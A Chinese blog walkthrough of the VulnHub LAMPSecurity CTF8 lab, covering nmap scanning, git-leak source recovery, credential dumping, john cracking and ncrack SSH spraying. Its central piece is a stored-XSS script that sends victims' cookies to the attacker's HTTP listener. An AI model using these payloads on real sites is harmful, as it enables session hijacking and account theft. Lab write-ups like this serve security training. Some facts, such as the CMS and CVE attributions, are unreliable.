LAMPSecurity: CTF8靶场渗透

发布于:2025-09-11 ⋅ 阅读:(19) ⋅ 点赞:(0)

LAMPSecurity: CTF8

来自 <https://www.vulnhub.com/entry/lampsecurity-ctf8,87/>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.141

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.141

1. 文件传输服务:21/tcp(FTP)

  • 服务版本:vsftpd 2.0.5(2007 年发布,超 15 年历史的老旧版本)
  • 关键配置:
    • 允许匿名登录(FTP 代码 230,无需账号密码即可访问)
    • 存在公开目录 pub(权限 drwxr-xr-x,所有人可读可执行)
  • 风险:匿名登录可能导致敏感文件泄露;vsftpd 2.0.5 存在已知漏洞(如 CVE-2011-0762,虽非远程代码执行,但可能被用于信息收集或弱口令爆破)。

2. 远程管理服务:22/tcp(SSH)

  • 服务版本:OpenSSH 4.3(2006 年发布,极度老旧)
  • 密钥信息:
    • DSA 密钥(1024 位,已不符合现代安全标准,易被破解)
    • RSA 密钥(2048 位,虽长度合规,但依赖的 OpenSSH 版本存在高危漏洞)
  • 风险:OpenSSH 4.3 存在多个远程漏洞(如 CVE-2008-1483,远程代码执行;CVE-2016-10012,权限提升),攻击者可直接利用漏洞获取系统权限。

3. 邮件服务:25/tcp(SMTP)、110/tcp(POP3)、143/tcp(IMAP)、993/tcp(SSL/IMAP)、995/tcp(SSL/POP3)

  • 核心组件:
    • SMTP:Sendmail 2.0.0(配置简单,无认证防护,易被用于发送垃圾邮件)
    • POP3/IMAP:Dovecot imapd(SSL 证书已过期超 10 年:有效期 2013.05.29-2014.05.29)
  • 关键风险:
    • SSL 证书过期:加密通信无效,数据(如邮件密码)可能被中间人劫持
    • 支持SSLv2 协议(已被废弃的不安全协议,存在 POODLE 等漏洞,易被破解加密)
    • SMTP 无认证:可能成为 “垃圾邮件中继站”,导致 IP 被黑名单封禁

4. Web 服务:80/tcp(HTTP)、443/tcp(HTTPS)

  • 服务版本:Apache httpd 2.2.3(2006 年发布,存在大量未修复漏洞)
  • 网站特征:
    • 标题 “LAMPSecurity Research”,推测为LAMPSecurity 靶场环境(用于渗透测试学习,但若为生产环境则风险极高)
    • 内容管理系统(CMS):Dovecot(通过 favicon 识别)
    • 暴露Git 仓库(路径 /.git/),包含 “initial commit” 提交记录
    • robots.txt 禁止访问 36 个路径(如/includes/、/modules/),但 Git 仓库暴露可能泄露源码
  • 风险:
    • Apache 2.2.3 存在高危漏洞(如 CVE-2011-3192,远程代码执行;CVE-2007-6750,目录遍历)
    • Git 仓库泄露:攻击者可下载完整源码,分析代码逻辑寻找 SQL 注入、文件上传等漏洞
    • HTTPS 证书过期(2013.05.29-2014.05.29),加密无效

5. 数据库服务:3306/tcp(MySQL)

  • 服务状态:开放但 “未授权访问”(扫描提示unauthorized)
  • 风险:虽当前拒绝匿名访问,但 MySQL 若使用弱口令(如root/123456),易被暴力破解;且老旧系统可能搭配低版本 MySQL(如 5.0.x),存在远程代码执行漏洞(如 CVE-2016-6662)。

6. 远程桌面服务:5801-5804/tcp(VNC-HTTP)、5901-5904/tcp(VNC)、6001-6004/tcp(X11)

  • 服务版本:RealVNC 4.0(2005 年发布,老旧版本)
  • 关键配置:
    • VNC 使用 “VNC Authentication” 认证(仅基于密码,无二次验证)
    • X11 服务开放(Linux 图形界面远程访问),但提示 “access denied”(当前拒绝访问,风险较低)
  • 风险:
    • RealVNC 4.0 存在密码破解漏洞(弱口令易被爆破,如默认密码password)
    • 同时开放 4 个 VNC 实例(5901-5904),扩大攻击面,若其中一个密码泄露则整机沦陷

7. 文件共享服务:139/tcp、445/tcp(Samba)

  • 服务版本:Samba 3.0.33-3.7.el5(2007 年左右版本,适配 CentOS 5)
  • 关键配置:
    • 工作组:WORKGROUP(默认工作组,无自定义防护)
    • 安全模式:message_signing: disabled(禁用消息签名,易被中间人攻击)
    • SMB2 协议协商失败,仅支持老旧的 SMB1 协议(存在永恒之蓝等漏洞)
  • 风险:Samba 3.0.x 存在高危漏洞(如 CVE-2007-2447,远程代码执行;CVE-2017-7494,文件上传漏洞),攻击者可利用漏洞获取系统权限。

8. 其他服务:111/tcp(rpcbind)、869/tcp(status)

  • rpcbind:负责 RPC 服务端口映射,无直接漏洞,但可能被用于探测内网其他 RPC 服务(如 NFS)
  • status:RPC 状态服务(端口 869),仅用于内部状态查询,风险较低

4,访问80端口开设的http服务

存在一个登录页面,再扫描其子目录看看

gobuster dir -u http://192.168.23.141/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403,400

再扫描识别网站指纹特征

whatweb -v http://192.168.23.141

查看页面源码得到第一个flag

5,扫出来一些敏感目录

dirsearch -u http://192.168.23.141 -x 404,403

http://192.168.23.141/phpinfo.php

得到第二个flag

view-source:http://192.168.23.141/tracker

得到第三个flag

http://192.168.23.141/robots.txt

第四个flag

http://192.168.23.141/profile 得到一堆用户名,可作为账号名字典

6,注意到存在git源码泄露,可以使用工具进行利用

export https_proxy="http://192.168.99.89:7897"  

git clone https://github.com/lijiejie/GitHack.git

cd GitHack

python GitHack.py http://192.168.23.141/.git/

cat 192.168.23.141/sites/default/settings.php

由此知道数据库用户名及密码:root/JumpUpAndDown,数据库名:drupal

7,使用nikto扫描web漏洞信息

nikto -h 192.168.23.141

可能存在XSS漏洞,尝试利用之

不存在抗点击劫持的X-Frame-Options标头。

X-XSS-Protection头没有定义。此header可以提示用户代理防止某些形式的XSS

没有设置X-Content-Type-Options标头。这可以让用户代理以一种不同于MIME类型的方式呈现网站内容

8,先注册一个账户

http://192.168.23.141/user/register

注册成功。寻找推送帖子的Barbara,在其发布的帖子的评论框内插入xss payload:

<script>alert(/xss/)</script>

证明存在XSS漏洞,那么就可以写一个payload窃取cookie

<script>

var request=new XMLHttpRequest();

var redirect_url="http://192.168.23.128:8000/"+document.cookie;

request.open("GET",redirect_url);

request.send();

</script>

kali需要一直开启一个http服务接收cookie

python -m http.server

回到http://192.168.182.128/tracker,点击Barbara,点击Contact

随便找个理由让她点进这个页面:

http://192.168.23.141/content/lampsec-point-security-available#comment-4

先编辑好发送邮件。这里就会接收到barbara的cookie,在浏览器开发者模式进行替换就能变成barbara用户

9,该用户拥有对网站查看的权限,怀疑存在代码执行漏洞,直接反弹shell失败。但是可以在网页执行PHP代码实现脱库

创建PHP页面来获取数据库所有表名:

<?php

$result = db_query('select table_name from information_schema.tables');

while($test = mysqli_fetch_object($result)){

print_r($test->table_name."<br/>");

}

?>

回显出各种数据表名

创建PHP页面来获取数据库所有表名:

<?php

$result = db_query('show tables');

while($test = mysqli_fetch_array($result)){

print_r($test[0]."<br/>");

}

?>

回显出drupal数据库中的表名

创建PHP页面来获取users表中有哪些字段:

<?php

$result = db_query('select * from users');

while($test = mysqli_fetch_object($result)){

print_r($test);

}

?>

回显出drupal数据库中users表中的字段名。

创建PHP页面来获取users表中name和pass字段:

<?php

$result = db_query('select name,pass from users');

while($test = db_fetch_object($result))

{

print $test->name . ":" . $test->pass . "<br/>";

}

?>

数据回显成功

10,用户名密码写入字典,然后进行解密

john -w=/usr/share/wordlists/rockyou.txt -form=raw-md5 /root/user.txt

然后分别建立user.txt和passwd.txt进行密码喷射以得到正确账户密码

ncrack -p 22 -U user.txt -P passwd.txt 192.168.23.141

login: bdio   password: passw0rd

login: spinkton   password: football123

login: jharraway   password: letmein!

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布